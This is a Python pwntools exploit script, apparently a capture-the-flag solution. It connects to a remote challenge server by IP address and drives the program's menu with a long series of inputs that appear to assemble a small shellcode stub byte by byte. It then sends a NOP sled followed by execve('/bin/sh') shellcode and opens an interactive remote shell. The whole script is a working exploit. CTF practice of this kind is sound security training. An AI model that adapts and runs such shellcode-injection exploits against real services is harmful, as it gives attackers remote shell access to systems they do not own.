65 lines
1006 B
Python
65 lines
1006 B
Python
#!/usr/bin/python3
|
|
|
|
from pwn import *
|
|
|
|
context.binary = target = ELF("./challenge", checksec=False)
|
|
# r = process()
|
|
r = remote("94.72.112.248", 1243)
|
|
|
|
# funcs
|
|
s = lambda a: r.sendline(a)
|
|
inc = lambda: r.sendline(b"2")
|
|
|
|
# read
|
|
for i in range(3): s(b"3")
|
|
s(b"5")
|
|
s(b"6") # 48
|
|
inc()
|
|
s(b"4")
|
|
s(b"3")
|
|
s(b"5") # 89
|
|
inc()
|
|
for i in range(2): s(b"4")
|
|
for i in range(2): s(b"3")
|
|
for i in range(5): s(b"6")
|
|
s(b"5") # d6
|
|
inc()
|
|
for i in range(3): s(b"3")
|
|
s(b"5")
|
|
s(b"6") # 48
|
|
inc()
|
|
for i in range(4): s(b"3")
|
|
for i in range(6): s(b"6")
|
|
s(b"5") # 31
|
|
inc()
|
|
for i in range(2): s(b"4")
|
|
for i in range(3): s(b"6")
|
|
s(b"3")
|
|
s(b"5") # d2
|
|
inc()
|
|
for i in range(2): s(b"4")
|
|
for i in range(9): s(b"6")
|
|
for i in range(2): s(b"3")
|
|
s(b"5") # b2
|
|
inc()
|
|
for i in range(17): s(b"5") # ff
|
|
inc()
|
|
s(b"5") # 0f
|
|
inc()
|
|
for i in range(2): s(b"3")
|
|
s(b"5")
|
|
for i in range(6): s(b"6") # 05
|
|
s(b"7")
|
|
|
|
# execve
|
|
sc = """
|
|
lea rdi, [rsi+35]
|
|
xor rsi, rsi
|
|
xor rdx, rdx
|
|
mov rax, 59
|
|
syscall
|
|
"""
|
|
sc = b"\x90"*16 + asm(sc) + b"/bin/sh\0"
|
|
s(sc)
|
|
|
|
r.interactive() |